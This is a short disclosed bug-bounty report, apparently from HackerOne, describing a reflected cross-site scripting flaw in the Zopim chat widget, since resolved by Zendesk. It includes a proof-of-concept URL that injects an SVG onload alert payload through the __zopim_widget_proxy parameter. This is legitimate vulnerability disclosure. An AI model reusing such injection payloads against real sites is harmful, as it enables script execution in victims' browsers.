Cross-site Scripting in all Zopim

Disclosed: 2015-10-20 22:53:27 By mdv To zendesk

Unknown

Vulnerability Details

Hello. This vulnerability works on all sites where there Zopim chat. Vulnerable link: https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E Vulnerable param is __zopim_widget_proxy. For XSS i used "></script><svg/onload=alert("XSS")> Tested in Mozilla Firefox.

Actions

View on HackerOne

Report Stats

Report ID: 94230
State: Closed
Substate: resolved
Upvotes: 2

Cross-site Scripting in all Zopim

Vulnerability Details

Actions

Report Stats

Share this report